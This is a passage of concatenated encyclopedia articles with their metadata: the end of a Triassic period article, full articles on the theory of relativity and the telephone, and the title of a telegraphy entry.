The first of the lizardlike Thalattosauria (askeptosaurs) and the highly successful ichthyopterygians, which appeared in Early Triassic seas, soon diversified. By the Middle Triassic, some ichthyopterygians were achieving very large body masses. Other reptiles Among other reptiles, the earliest turtles, like Proganochelys and Proterochersis, appeared during the Norian Age (Stage) of the Late Triassic Period. The Lepidosauromorpha, specifically the Sphenodontia, are first found in the fossil record of the earlier Carnian Age, though the earliest lepidosauromorphs likely occurred in the Permian. The Procolophonidae, the last surviving parareptiles, were an important group of small lizard-like herbivores. The drepanosaurs were a clade of unusual, chameleon-like arboreal reptiles with birdlike heads and specialised claws. Synapsids Three therapsid groups survived into the Triassic: dicynodonts, therocephalians, and cynodonts. The cynodont Cynognathus was a characteristic top predator in the Olenekian and Anisian of Gondwana. Both kannemeyeriiform dicynodonts and gomphodont cynodonts remained important herbivores during much of the period. Therocephalians included both large predators (Moschorhinus) and herbivorous forms (bauriids) until their extinction midway through the period. Ecteniniid cynodonts played a role as large-sized, cursorial predators in the Late Triassic. During the Carnian (early part of the Late Triassic), some advanced cynodonts gave rise to the first mammals. During the Triassic, archosaurs displaced therapsids as the largest and most ecologically prolific terrestrial amniotes. This "Triassic Takeover" may have contributed to the evolution of mammals by forcing the surviving therapsids and their mammaliaform successors to live as small, mainly nocturnal insectivores. Nocturnal life may have forced the mammaliaforms to develop fur and a higher metabolic rate. Lagerstätten Two Early Triassic lagerstätten (high-quality fossil beds), the Dienerian aged Guiyang biota and the earliest Spathian aged Paris biota stand out due to their exceptional preservation and diversity. They represent the earliest lagerstätten of the Mesozoic era and provide insight into the biotic recovery from the Permian-Triassic mass extinction event. The Monte San Giorgio lagerstätte, now in the Lake Lugano region of northern Italy and southern Switzerland, was in Middle Triassic times a lagoon behind reefs with an anoxic bottom layer, so there were no scavengers and little turbulence to disturb fossilization, a situation that can be compared to the better-known Jurassic Solnhofen Limestone lagerstätte. The remains of fish and various marine reptiles (including the common pachypleurosaur Neusticosaurus, and the bizarre long-necked archosauromorph Tanystropheus), along with some terrestrial forms like Ticinosuchus and Macrocnemus, have been recovered from this locality. All these fossils date from the Anisian and Ladinian ages (about 242 Ma ago). Triassic–Jurassic extinction event The Triassic Period ended with a mass extinction, which was particularly severe in the oceans; the conodonts disappeared, as did all the marine reptiles except ichthyosaurs and plesiosaurs. Invertebrates like brachiopods and molluscs (such as gastropods) were severely affected. In the oceans, 22% of marine families and possibly about half of marine genera went missing. Though the end-Triassic extinction event was not equally devastating in all terrestrial ecosystems, several important clades of crurotarsans (large archosaurian reptiles previously grouped together as the thecodonts) disappeared, as did most of the large labyrinthodont amphibians, groups of small reptiles, and most synapsids. Some of the early, primitive dinosaurs also became extinct, but more adaptive ones survived to evolve into the Jurassic. Surviving plants that went on to dominate the Mesozoic world included modern conifers and cycadeoids. The cause of the Late Triassic extinction is uncertain. It was accompanied by huge volcanic eruptions that occurred as the supercontinent Pangaea began to break apart about 202 to 191 million years ago (40Ar/39Ar dates), forming the Central Atlantic Magmatic Province (CAMP), one of the largest known inland volcanic events since the planet had first cooled and stabilized. Other possible but less likely causes for the extinction events include global cooling or even a bolide impact, for which an impact crater containing Manicouagan Reservoir in Quebec, Canada, has been singled out. However, the Manicouagan impact melt has been dated to 214±1 Mya. The date of the Triassic-Jurassic boundary has also been more accurately fixed recently, at Mya. Both dates are gaining accuracy by using more accurate forms of radiometric dating, in particular the decay of uranium to lead in zircons formed at time of the impact. So, the evidence suggests the Manicouagan impact preceded the end of the Triassic by approximately 10±2 Ma. It could not therefore be the immediate cause of the observed mass extinction. The number of Late Triassic extinctions is disputed. Some studies suggest that there are at least two periods of extinction towards the end of the Triassic, separated by 12 to 17 million years. But arguing against this is a recent study of North American faunas. In the Petrified Forest of northeast Arizona there is a unique sequence of late Carnian-early Norian terrestrial sediments. An analysis in 2002 found no significant change in the paleoenvironment. Phytosaurs, the most common fossils there, experienced a change-over only at the genus level, and the number of species remained the same. Some aetosaurs, the next most common tetrapods, and early dinosaurs, passed through unchanged. However, both phytosaurs and aetosaurs were among the groups of archosaur reptiles completely wiped out by the end-Triassic extinction event. It seems likely then that there was some sort of end-Carnian extinction, when several herbivorous archosauromorph groups died out, while the large herbivorous therapsids—the kannemeyeriid dicynodonts and the traversodont cynodonts—were much reduced in the northern half of Pangaea (Laurasia). These extinctions within the Triassic and at its end allowed the dinosaurs to expand into many niches that had become unoccupied. Dinosaurs became increasingly dominant, abundant and diverse, and remained that way for the next 150 million years. The true "Age of Dinosaurs" is during the following Jurassic and Cretaceous periods, rather than the Triassic.
Physical sciences
Geological periods
null
30001
https://en.wikipedia.org/wiki/Theory%20of%20relativity
Theory of relativity
The theory of relativity usually encompasses two interrelated physics theories by Albert Einstein: special relativity and general relativity, proposed and published in 1905 and 1915, respectively. Special relativity applies to all physical phenomena in the absence of gravity. General relativity explains the law of gravitation and its relation to the forces of nature. It applies to the cosmological and astrophysical realm, including astronomy. The theory transformed theoretical physics and astronomy during the 20th century, superseding a 200-year-old theory of mechanics created primarily by Isaac Newton. It introduced concepts including 4-dimensional spacetime as a unified entity of space and time, relativity of simultaneity, kinematic and gravitational time dilation, and length contraction. In the field of physics, relativity improved the science of elementary particles and their fundamental interactions, along with ushering in the nuclear age. With relativity, cosmology and astrophysics predicted extraordinary astronomical phenomena such as neutron stars, black holes, and gravitational waves. Development and acceptance Albert Einstein published the theory of special relativity in 1905, building on many theoretical results and empirical findings obtained by Albert A. Michelson, Hendrik Lorentz, Henri Poincaré and others. Max Planck, Hermann Minkowski and others did subsequent work. Einstein developed general relativity between 1907 and 1915, with contributions by many others after 1915. The final form of general relativity was published in 1916. The term "theory of relativity" was based on the expression "relative theory" () used in 1906 by Planck, who emphasized how the theory uses the principle of relativity. In the discussion section of the same paper, Alfred Bucherer used for the first time the expression "theory of relativity" (). By the 1920s, the physics community understood and accepted special relativity. It rapidly became a significant and necessary tool for theorists and experimentalists in the new fields of atomic physics, nuclear physics, and quantum mechanics. By comparison, general relativity did not appear to be as useful, beyond making minor corrections to predictions of Newtonian gravitation theory. It seemed to offer little potential for experimental test, as most of its assertions were on an astronomical scale. Its mathematics seemed difficult and fully understandable only by a small number of people. Around 1960, general relativity became central to physics and astronomy. New mathematical techniques to apply to general relativity streamlined calculations and made its concepts more easily visualized. As astronomical phenomena were discovered, such as quasars (1963), the 3-kelvin microwave background radiation (1965), pulsars (1967), and the first black hole candidates (1981), the theory explained their attributes, and measurement of them further confirmed the theory. Special relativity Special relativity is a theory of the structure of spacetime. It was introduced in Einstein's 1905 paper "On the Electrodynamics of Moving Bodies" (for the contributions of many other physicists and mathematicians, see History of special relativity). Special relativity is based on two postulates which are contradictory in classical mechanics: The laws of physics are the same for all observers in any inertial frame of reference relative to one another (principle of relativity). The speed of light in vacuum is the same for all observers, regardless of their relative motion or of the motion of the light source. The resultant theory copes with experiment better than classical mechanics. For instance, postulate 2 explains the results of the Michelson–Morley experiment. Moreover, the theory has many surprising and counterintuitive consequences. Some of these are: Relativity of simultaneity: Two events, simultaneous for one observer, may not be simultaneous for another observer if the observers are in relative motion. Time dilation: Moving clocks are measured to tick more slowly than an observer's "stationary" clock. Length contraction: Objects are measured to be shortened in the direction that they are moving with respect to the observer. Maximum speed is finite: No physical object, message or field line can travel faster than the speed of light in vacuum. The effect of gravity can only travel through space at the speed of light, not faster or instantaneously. Mass–energy equivalence: , energy and mass are equivalent and transmutable. Relativistic mass, idea used by some researchers. The defining feature of special relativity is the replacement of the Galilean transformations of classical mechanics by the Lorentz transformations. (See Maxwell's equations of electromagnetism.) General relativity General relativity is a theory of gravitation developed by Einstein in the years 1907–1915. The development of general relativity began with the equivalence principle, under which the states of accelerated motion and being at rest in a gravitational field (for example, when standing on the surface of the Earth) are physically identical. The upshot of this is that free fall is inertial motion: an object in free fall is falling because that is how objects move when there is no force being exerted on them, instead of this being due to the force of gravity as is the case in classical mechanics. This is incompatible with classical mechanics and special relativity because in those theories inertially moving objects cannot accelerate with respect to each other, but objects in free fall do so. To resolve this difficulty Einstein first proposed that spacetime is curved. Einstein discussed his idea with mathematician Marcel Grossmann and they concluded that general relativity could be formulated in the context of Riemannian geometry which had been developed in the 1800s. In 1915, he devised the Einstein field equations which relate the curvature of spacetime with the mass, energy, and any momentum within it. Some of the consequences of general relativity are: Gravitational time dilation: Clocks run slower in deeper gravitational wells. Precession: Orbits precess in a way unexpected in Newton's theory of gravity. (This has been observed in the orbit of Mercury and in binary pulsars). Light deflection: Rays of light bend in the presence of a gravitational field. Frame-dragging: Rotating masses "drag along" the spacetime around them. Expansion of the universe: The universe is expanding, and certain components within the universe can accelerate the expansion. Technically, general relativity is a theory of gravitation whose defining feature is its use of the Einstein field equations. The solutions of the field equations are metric tensors which define the topology of the spacetime and how objects move inertially. Experimental evidence Einstein stated that the theory of relativity belongs to a class of "principle-theories". As such, it employs an analytic method, which means that the elements of this theory are not based on hypothesis but on empirical discovery. By observing natural processes, we understand their general characteristics, devise mathematical models to describe what we observed, and by analytical means we deduce the necessary conditions that have to be satisfied. Measurement of separate events must satisfy these conditions and match the theory's conclusions. Tests of special relativity Relativity is a falsifiable theory: It makes predictions that can be tested by experiment. In the case of special relativity, these include the principle of relativity, the constancy of the speed of light, and time dilation. The predictions of special relativity have been confirmed in numerous tests since Einstein published his paper in 1905, but three experiments conducted between 1881 and 1938 were critical to its validation. These are the Michelson–Morley experiment, the Kennedy–Thorndike experiment, and the Ives–Stilwell experiment. Einstein derived the Lorentz transformations from first principles in 1905, but these three experiments allow the transformations to be induced from experimental evidence. Maxwell's equations—the foundation of classical electromagnetism—describe light as a wave that moves with a characteristic velocity. The modern view is that light needs no medium of transmission, but Maxwell and his contemporaries were convinced that light waves were propagated in a medium, analogous to sound propagating in air, and ripples propagating on the surface of a pond. This hypothetical medium was called the luminiferous aether, at rest relative to the "fixed stars" and through which the Earth moves. Fresnel's partial ether dragging hypothesis ruled out the measurement of first-order (v/c) effects, and although observations of second-order effects (v2/c2) were possible in principle, Maxwell thought they were too small to be detected with then-current technology. The Michelson–Morley experiment was designed to detect second-order effects of the "aether wind"—the motion of the aether relative to the Earth. Michelson designed an instrument called the Michelson interferometer to accomplish this. The apparatus was sufficiently accurate to detect the expected effects, but he obtained a null result when the first experiment was conducted in 1881, and again in 1887. Although the failure to detect an aether wind was a disappointment, the results were accepted by the scientific community. In an attempt to salvage the aether paradigm, FitzGerald and Lorentz independently created an ad hoc hypothesis in which the length of material bodies changes according to their motion through the aether. This was the origin of FitzGerald–Lorentz contraction, and their hypothesis had no theoretical basis. The interpretation of the null result of the Michelson–Morley experiment is that the round-trip travel time for light is isotropic (independent of direction), but the result alone is not enough to discount the theory of the aether or validate the predictions of special relativity. While the Michelson–Morley experiment showed that the velocity of light is isotropic, it said nothing about how the magnitude of the velocity changed (if at all) in different inertial frames. The Kennedy–Thorndike experiment was designed to do that, and was first performed in 1932 by Roy Kennedy and Edward Thorndike. They obtained a null result, and concluded that "there is no effect ... unless the velocity of the solar system in space is no more than about half that of the earth in its orbit". That possibility was thought to be too coincidental to provide an acceptable explanation, so from the null result of their experiment it was concluded that the round-trip time for light is the same in all inertial reference frames. The Ives–Stilwell experiment was carried out by Herbert Ives and G.R. Stilwell first in 1938 and with better accuracy in 1941. It was designed to test the transverse Doppler effect the redshift of light from a moving source in a direction perpendicular to its velocity—which had been predicted by Einstein in 1905. The strategy was to compare observed Doppler shifts with what was predicted by classical theory, and look for a Lorentz factor correction. Such a correction was observed, from which was concluded that the frequency of a moving atomic clock is altered according to special relativity. Those classic experiments have been repeated many times with increased precision. Other experiments include, for instance, relativistic energy and momentum increase at high velocities, experimental testing of time dilation, and modern searches for Lorentz violations. Tests of general relativity General relativity has also been confirmed many times, the classic experiments being the perihelion precession of Mercury's orbit, the deflection of light by the Sun, and the gravitational redshift of light. Other tests confirmed the equivalence principle and frame dragging. Modern applications Far from being simply of theoretical interest, relativistic effects are important practical engineering concerns. Satellite-based measurement needs to take into account relativistic effects, as each satellite is in motion relative to an Earth-bound user, and is thus in a different frame of reference under the theory of relativity. Global positioning systems such as GPS, GLONASS, and Galileo, must account for all of the relativistic effects in order to work with precision, such as the consequences of the Earth's gravitational field. This is also the case in the high-precision measurement of time. Instruments ranging from electron microscopes to particle accelerators would not work if relativistic considerations were omitted.
Physical sciences
Physics
null
30003
https://en.wikipedia.org/wiki/Telephone
Telephone
A telephone, colloquially referred to as a phone, is a telecommunications device that enables two or more users to conduct a conversation when they are too far apart to be easily heard directly. A telephone converts sound, typically and most efficiently the human voice, into electronic signals that are transmitted via cables and other communication channels to another telephone which reproduces the sound to the receiving user. The term is derived from and (, voice), together meaning distant voice. In 1876, Alexander Graham Bell was the first to be granted a United States patent for a device that produced clearly intelligible replication of the human voice at a second device. This instrument was further developed by many others, and became rapidly indispensable in business, government, and in households. The essential elements of a telephone are a microphone (transmitter) to speak into and an earphone (receiver) which reproduces the voice at a distant location. The receiver and transmitter are usually built into a handset which is held up to the ear and mouth during conversation. The transmitter converts the sound waves to electrical signals which are sent through the telecommunications system to the receiving telephone, which converts the signals into audible sound in the receiver or sometimes a loudspeaker. Telephones permit transmission in both directions simultaneously. Most telephones also contain an alerting feature, such as a ringer or a visual indicator, to announce an incoming telephone call. Telephone calls are initiated most commonly with a keypad or dial, affixed to the telephone, to enter a telephone number, which is the address of the call recipient's telephone in the telecommunications system, but other methods existed in the early history of the telephone. The first telephones were directly connected to each other from one customer's office or residence to another customer's location. Being impractical beyond just a few customers, these systems were quickly replaced by manually operated centrally located switchboards. These exchanges were soon connected together, eventually forming an automated, worldwide public switched telephone network. For greater mobility, various radio systems were developed in the mid-20th century for transmission between mobile stations on ships and in automobiles. Handheld mobile phones were introduced for personal service starting in 1973. In later decades, the analog cellular system evolved into digital networks with greater capability and lower cost. Convergence in communication services has provided a broad spectrum of capabilities in cell phones, including mobile computing, giving rise to the smartphone, the dominant type of telephone in the world today. Modern telephones exist in various forms and are implemented through different systems, including fixed-line, cellular, satellite, and Internet-based devices, all of which are integrated into a global telecommunication network. This interconnected system allows any telephone, regardless of its underlying technology or geographic location, to reach another through a unique telephone number. While mobile and landline services are fully integrated into the public switched telephone network (PSTN), some Internet-based services, such as VoIP, may not always be directly connected to the PSTN, though they still allow communication across different systems when a connection is made. This ensures that a telephone number can be used universally to connect individuals globally. Early history Before the development of the electric telephone, the term telephone was applied to other inventions, and not all early researchers of the electrical device used the term. Perhaps the earliest use of the word for a communications system was the telephon created by Gottfried Huth in 1796. Huth proposed an alternative to the optical telegraph of Claude Chappe in which the operators in the signaling towers would shout to each other by means of what he called "speaking tubes", but would now be called giant megaphones. A communication device for sailing vessels, called telephone, was invented by Captain John Taylor in 1844. This instrument used four air horns to communicate with vessels in foggy weather. Johann Philipp Reis used the term in reference to his invention, commonly known as the Reis telephone, in c. 1860. His device appears to be the first device based on the conversion of sound into electrical impulses. The term telephone was adopted into the vocabulary of many languages. It is derived from the , tēle, "far" and φωνή, phōnē, "voice", together meaning "distant voice". Credit for the invention of the electric telephone is frequently disputed. As with other influential inventions such as radio, television, the light bulb, and the computer, several inventors pioneered experimental work on voice transmission over a wire and improved on each other's ideas. New controversies over the issue still arise from time to time. Charles Bourseul, Antonio Meucci, Johann Philipp Reis, Alexander Graham Bell, and Elisha Gray, amongst others, have all been credited with the invention of the telephone. Alexander Graham Bell was the first to be awarded a patent for the electric telephone by the United States Patent and Trademark Office (USPTO) in March 1876. Before Bell's patent, the telephone transmitted sound in a way that was similar to the telegraph. This method used vibrations and circuits to send electrical pulses, but was missing key features. Bell found that this method produced a sound through intermittent currents, but in order for the telephone to work a fluctuating current reproduced sounds the best. The fluctuating currents became the basis for the working telephone, creating Bell's patent. That first patent by Bell was the master patent of the telephone, from which other patents for electric telephone devices and features flowed. In 1876, shortly after Bell's patent application, Hungarian engineer Tivadar Puskás proposed the telephone switch, which allowed for the formation of telephone exchanges, and eventually networks. In the United Kingdom, the blower is used as a slang term for a telephone. The term came from navy slang for a speaking tube. In the U.S., a somewhat dated slang term refers to the telephone as "the horn," as in "I couldn't get him on the horn," or "I'll be off the horn in a moment." Timeline of early development 1844: Innocenzo Manzetti first mooted the idea of a "speaking telegraph" or telephone. Use of the "speaking telegraph" and "sound telegraph" monikers would eventually be replaced by the newer, distinct name, "telephone". 26 August 1854: Charles Bourseul published an article in the magazine L'Illustration (Paris): "Transmission électrique de la parole" (electric transmission of speech), describing a "make-and-break" type telephone transmitter later created by Johann Reis. 26 October 1861: Johann Philipp Reis (1834–1874) publicly demonstrated the Reis telephone before the Physical Society of Frankfurt. It was the first device to transmit a voice via electronic signals and for that the first modern telephone. Reis also coined the term. He used his telephone to transmit the phrase "Das Pferd frisst keinen Gurkensalat" ("The horse does not eat cucumber salad"). 22 August 1865, La Feuille d'Aoste reported "It is rumored that English technicians to whom Manzetti illustrated his method for transmitting spoken words on the telegraph wire intend to apply said invention in England on several private telegraph lines". However, telephones would not be demonstrated there until 1876, with a set of telephones from Bell. 28 December 1871: Antonio Meucci files patent caveat No. 3335 in the U.S. Patent Office, titled "Sound Telegraph", describing communication of voice between two people by wire. A patent caveat was not an invention patent award, but only an unverified notice filed by an individual that he or she intends to file a patent application in the future. 1874: Meucci, after having renewed the caveat for two years does not renew it again, and the caveat lapses. 6 April 1875: Bell's U.S. Patent 161,739 "Transmitters and Receivers for Electric Telegraphs" is granted. This uses multiple vibrating steel reeds in make-break circuits. 11 February 1876: Elisha Gray invents a liquid transmitter for use with the telephone but does not build one. 14 February 1876: Gray files a patent caveat for transmitting the human voice through a telegraphic circuit. 14 February 1876: Alexander Graham Bell applies for the patent "Improvements in Telegraphy", for electromagnetic telephones using what is now called amplitude modulation (oscillating current and voltage) but which he referred to as "undulating current". 19 February 1876: Gray is notified by the U.S. Patent Office of an interference between his caveat and Bell's patent application. Gray decides to abandon his caveat. 7 March 1876: Bell's U.S. patent 174,465 "Improvement in Telegraphy" is granted, covering "the method of, and apparatus for, transmitting vocal or other sounds telegraphically…by causing electrical undulations, similar in form to the vibrations of the air accompanying the said vocal or other sound." 10 March 1876: The first successful telephone transmission of clear speech using a liquid transmitter when Bell spoke into his device, "Mr. Watson, come here, I want to see you." and Watson heard each word distinctly. 30 January 1877: Bell's U.S. patent 186,787 is granted for an electromagnetic telephone using permanent magnets, iron diaphragms, and a call bell. 27 April 1877: Thomas Edison files a patent application for a carbon (graphite) transmitter. It was published as No. 474,230 on 3 May 1892, after a 15-year delay because of litigation. Edison was granted patent 222,390 for a carbon granules transmitter in 1879. Early commercial instruments Early telephones were technically diverse. Some used a water microphone, some had a metal diaphragm that induced current in an electromagnet wound around a permanent magnet, and some were dynamic – their diaphragm vibrated a coil of wire in the field of a permanent magnet or the coil vibrated the diaphragm. The sound-powered dynamic variants survived in small numbers through the 20th century in military and maritime applications, where its ability to create its own electrical power was crucial. Most, however, used the Edison/Berliner carbon transmitter, which was much louder than the other kinds, even though it required an induction coil which was an impedance matching transformer to make it compatible with the impedance of the line. The Edison patents kept the Bell monopoly viable into the 20th century, by which time the network was more important than the instrument. Early telephones were locally powered, using either a dynamic transmitter or by the powering of a transmitter with a local battery. One of the jobs of outside plant personnel was to visit each telephone periodically to inspect the battery. During the 20th century, telephones powered from the telephone exchange over the same wires that carried the voice signals became common. Early telephones used a single wire for the subscriber's line, with ground return used to complete the circuit (as used in telegraphs). The earliest dynamic telephones also had only one port opening for sound, with the user alternately listening and speaking (or rather, shouting) into the same hole. Sometimes the instruments were operated in pairs at each end, making conversation more convenient but also more expensive. At first, the benefits of a telephone exchange were not exploited. Instead, telephones were leased in pairs to a subscriber, who had to arrange for a telegraph contractor to construct a line between them, for example, between a home and a shop. Users who wanted the ability to speak to several different locations would need to obtain and set up three or four pairs of telephones. Western Union, already using telegraph exchanges, quickly extended the principle to its telephones in New York City and San Francisco, and Bell was not slow in appreciating the potential. Signalling began in an appropriately primitive manner. The user alerted the other end, or the exchange operator, by whistling into the transmitter. Exchange operation soon resulted in telephones being equipped with a bell in a ringer box, first operated over a second wire, and later over the same wire, but with a condenser (capacitor) in series with the bell coil to allow the AC ringer signal through while still blocking DC (keeping the phone "on hook"). Telephones connected to the earliest Strowger switch automatic exchanges had seven wires, one for the knife switch, one for each telegraph key, one for the bell, one for the push-button and two for speaking. Large wall telephones in the early 20th century usually incorporated the bell, and separate bell boxes for desk phones dwindled away in the middle of the century. Rural and other telephones that were not on a common battery exchange had a magneto hand-cranked generator to produce a high voltage alternating signal to ring the bells of other telephones on the line and to alert the operator. Some local farming communities that were not connected to the main networks set up barbed wire telephone lines that exploited the existing system of field fences to transmit the signal. In the 1890s a new smaller style of telephone was introduced, packaged in three parts. The transmitter stood on a stand, known as a "candlestick" for its shape. When not in use, the receiver hung on a hook with a switch in it, known as a "switchhook". Previous telephones required the user to operate a separate switch to connect either the voice or the bell. With the new kind, the user was less likely to leave the phone "off the hook". In phones connected to magneto exchanges, the bell, induction coil, battery and magneto were in a separate bell box or "ringer box". In phones connected to common battery exchanges, the ringer box was installed under a desk, or other out-of-the-way place, since it did not need a battery or magneto. Cradle designs were also used at this time, having a handle with the receiver and transmitter attached, now called a handset, separate from the cradle base that housed the magneto crank and other parts. They were larger than the "candlestick" and more popular. Disadvantages of single-wire operation such as crosstalk and hum from nearby AC power wires had already led to the use of twisted pairs and, for long-distance telephones, four-wire circuits. Users at the beginning of the 20th century did not place long-distance calls from their own telephones but made an appointment and were connected with the assistance of a telephone operator. What turned out to be the most popular and longest-lasting physical style of telephone was introduced in the early 20th century, including Bell's 202-type desk set. A carbon granule transmitter and electromagnetic receiver were united in a single molded plastic handle, which when not in use was secured in a cradle in the base unit. The circuit diagram of the model 202 shows the direct connection of the transmitter to the line, while the receiver was inductively coupled. In local battery configurations, when the local loop was too long to provide sufficient current from the exchange, the transmitter was powered by a local battery and inductively coupled, while the receiver was included in the local loop. The coupling transformer and the ringer were mounted in a separate enclosure, called the subscriber set. The dial switch in the base interrupted the line current by repeatedly but very briefly disconnecting the line one to ten times for each digit, and the hook switch (in the center of the circuit diagram) disconnected the line and the transmitter battery while the handset was on the cradle. In the 1930s, telephone sets were developed that combined the bell and induction coil with the desk set, obviating a separate ringer box. The rotary dial becoming commonplace in the 1930s in many areas enabled customer-dialed service, but some magneto systems remained even into the 1960s. After World War II, the telephone networks saw rapid expansion and more efficient telephone sets, such as the model 500 telephone in the United States, were developed that permitted larger local networks centered around central offices. A breakthrough new technology was the introduction of Touch-Tone signaling using push-button telephones by American Telephone & Telegraph Company (AT&T) in 1963. Sound-powered telephones A sound-powered telephone is a telephone which transmits voice communication by wire, powered by the energy of the sound waves of the operator speaking. Principle of operation A moving-coil microphone converts the sound waves into an electrical signal, which is then converted back into sound waves at the receiver's end. Similar to early regular landline telephones, operators of sound-powered telephones generally alert the receiver of a call using a hand-cranked generator (magneto), which generates an electrical current which activates a buzzer at the receiver's end, sometimes known as a howler or growler. Some telephone systems can use external electrical power to operate ringers or amplifiers, but will revert to sound-powered communications in the event of failure of the external power supply. Stations are usually connected via twisted pair wires to reduce electrical interference, and can be positioned at considerable distances from each other in the order of several kilometers. Using 1mm core diameter twisted-pair wiring, some sound-powered telephone systems can operate a pair of handsets positioned up to 48km (30 miles) apart. Applications Because sound-powered telephones do not require external electrical power, they are used where reliable communications are vital even in event of loss of power. They are often used for communications in airports, railways and public utilities, mining, ski slopes, bridges, sporting arenas and shipyards. Because they operate at low voltages, they are suitable for use in situations where there is a risk of explosions or fire, such as chemical plants, oil and gas works, arsenals, mines and quarries. They are frequently used aboard ships, especially naval vessels, and in land military communications. Aboard naval vessels, sound-powered telephones generally have auxiliary wiring circuits routed through the ship, to reduce the likelihood that all circuits will be rendered inoperable by battle damage. Digital telephones and voice over IP The invention of the transistor in 1947 dramatically changed the technology used in telephone systems and in the long-distance transmission networks, over the next several decades. With the development of stored program control and MOS integrated circuits for electronic switching systems, and new transmission technologies such as pulse-code modulation (PCM), telephony gradually evolved towards digital telephony, which improved the capacity, quality, and cost of the network. Integrated Services Digital Network (ISDN) was launched in the 1980's, providing businesses and consumers with access to digital telephony services such as data, voice, video, and fax services. The development of digital data communications methods made it possible to digitize voice and transmit it as real-time data across computer networks and the Internet, giving rise to the field of Internet Protocol (IP) telephony, also known as voice over Internet Protocol (VoIP). VoIP has proven to be a disruptive technology that is rapidly replacing traditional telephone network infrastructure. By January 2005, up to 10% of telephone subscribers in Japan and South Korea had switched to this digital telephone service. A January 2005 Newsweek article suggested that Internet telephony may be "the next big thing." The technology has spawned a new industry comprising many VoIP companies that offer services to consumers and businesses. The reported global VoIP market in October 2021 was $85.2 billion with a projection of $102.5 billion by 2026. IP telephony uses high-bandwidth Internet connections and specialized customer premises equipment to transmit telephone calls via the Internet, or any modern private data network. The customer equipment may be an analog telephone adapter (ATA) which translates the signals of a conventional analog telephone; an IP Phone, a dedicated standalone device; or a computer softphone application, utilizing the microphone and headset devices of a personal computer or smartphone. In recent years, VoIP technology has evolved to integrate with mobile networks, including Voice over LTE (VoLTE) and Voice over 5G (Vo5G), enabling seamless voice communication over mobile data networks. These advancements have made VoIP not only a primary method for Internet-based communication but also a central feature of modern mobile communication infrastructure. While traditional analog telephones are typically powered from the central office through the telephone line, digital telephones require a local power supply. Internet-based digital service also requires special provisions to provide the service location to the emergency services when an emergency telephone number is called. Cordless telephones A cordless telephone or portable telephone consists of a base station unit and one or more portable cordless handsets. The base station connects to a telephone line, or provides service by voice over IP (VOIP). The handset communicates with the base station via radio frequency signals. A handset's operational range is limited, usually to within the same building or within a short distance from the base station. Base station Base stations include a radio transceiver which enables full-duplex, outgoing and incoming signals and speech with the handsets. The base station often includes a microphone, audio amplifier, and a loudspeaker to enable hands-free speakerphone conversations, without needing to use a handset. The base station may also have a numeric keypad for dialing, and a display for caller ID. In addition, answering machine function may be built in. The cordless handset contains a rechargeable battery, which the base station recharges when the handset rests in its cradle. Muilt-handset systems generally also have additional charging stands. A cordless telephone typically requires a constant electricity supply to power the base station and charger units by means of a DC transformer which plugs into a wall AC power outlet. Mobile phones A mobile phone or cellphone or hand phone is a handheld telephone which connects via radio transmissions to a cellular telephone network. The cellular network consists of a network of ground based transmitter/receiver stations with antennas – which are usually located on towers or on buildings – and infrastructure connecting to the global telecommunications network. Analog cellular networks first appeared in 1979, followed by the introduction of digital cellular networks in the early 1990s, marking the beginning of the GSM standard. Over time, these networks evolved, with each new generation (2G, 3G, 4G, and beyond) offering improved data transmission capabilities and more advanced features for mobile communication. Mobile phones require a SIM card to be inserted into the phone. The SIM card is a small PVC card containing a small integrated circuit which stores the user's international mobile subscriber identity (IMSI) number and its related key, which are used to identify and authenticate subscribers to the cellular network. Mobile phones generally incorporate an LCD or OLED display, with some types, such as smartphones, having touch screens. Since the 1990s, mobile phones have gained other features which are not directly related to their primary function as telephones. These include text messaging, calendars, alarm clocks, personal schedulers, cameras, music players, games and later, internet access and smartphone functionality. Nearly all mobile phones have the ability to send text messages to other users via the SMS (Short Message Service) protocol. The multimedia messaging service (MMS) protocol enables users to send and receive multimedia content, such as photos, audio files and video files. As their functionality has increased over the years, many types of mobile phone, notably smartphones, require an operating system to run. Popular mobile phone operating systems in the past have included Symbian, Palm OS, BlackBerry OS and mobile phone versions of Windows. As of 2022, the most used operating systems are Google's Android and Apple's iOS. Before the era of smartphones, mobile phones were generally manufactured by companies specializing in telecommunications equipment, such as Nokia, Motorola, and Ericsson. Since the advent of smartphones, mobile phone manufacturers have also included consumer electronics companies, such as Apple, Samsung and Xiaomi. Smartphones As of 2022, most mobile phones are smartphones, being a combination of a mobile phone and a personal computing device in the same unit. Most smartphones are primarily operated using a graphical user interface and a touch screen. Many phones have a secondary voice user interface, such as Siri on Apple iPhones, which can operate many of the device's functions, as well as enabling users to use spoken commands to interact with the internet. Typically alphanumeric text input is accomplished via an on-screen virtual keyboard, although some smartphones have a small physical keyboard. Smartphones offer the ability to access internet data through the cellular network and via wi-fi, and usually allow direct connectivity to other devices via Bluetooth or a wired interface, such as USB or Lightning connectors. Smartphones, being able to run apps, have vastly expanded functionality compared to previous mobile phones. Having internet access and built in cameras, smartphones have made video calling readily accessible via IP connections. Smartphones also have access to a large number of web services and web apps, giving them functionality similar to traditional computers, although smartphones are often limited by their relatively small screen size and the size of their keyboards. Typically, smartphones feature such tools as cameras, media players, web browsers, email clients, interactive maps, satellite navigation and a variety of sensors, such as a compass, accelerometers and GPS receivers. In addition to voice calls, smartphone users commonly communicate using a wide variety of messaging formats, including SMS, MMS, email, and various proprietary messaging services, such as iMessage and various social media platforms. Mobile phone usage In 2002, only 10% of the world's population used mobile phones and by 2005 that percentage had risen to 46%. By the end of 2009, there were a total of nearly 6 billion mobile and fixed-line telephone subscribers worldwide. This included 1.26 billion fixed-line subscribers and 4.6 billion mobile subscribers. Satellite phones A satellite telephone, or satphone, is a type of mobile phone that connects to other phones or the telephone network by radio link through satellites orbiting the Earth instead of terrestrial cell sites, as cellphones do. Therefore, they can work in most geographic locations on the Earth's surface, as long as open sky and the line-of-sight between the phone and the satellite is provided. Depending on the architecture of a particular system, coverage may include the entire Earth or only specific regions. Satellite phones provide similar functionality to terrestrial mobile telephones; voice calling, text messaging, and low-bandwidth Internet access are supported through most systems. The advantage of a satellite phone is that it can be used in such regions where local terrestrial communication infrastructures, such as landline and cellular networks, are not available. Satellite phones are popular on expeditions into remote locations, hunting, fishing, maritime sector, humanitarian missions, business trips, and mining in hard-to-reach areas, where there is no reliable cellular service. Satellite telephones rarely get disrupted by natural disasters on Earth or human actions such as war, so they have proven to be dependable communication tools in emergency situations, when the local communications system can be compromised.
Technology
Media and communication
null
30010
https://en.wikipedia.org/wiki/Telegraphy
Telegraphy
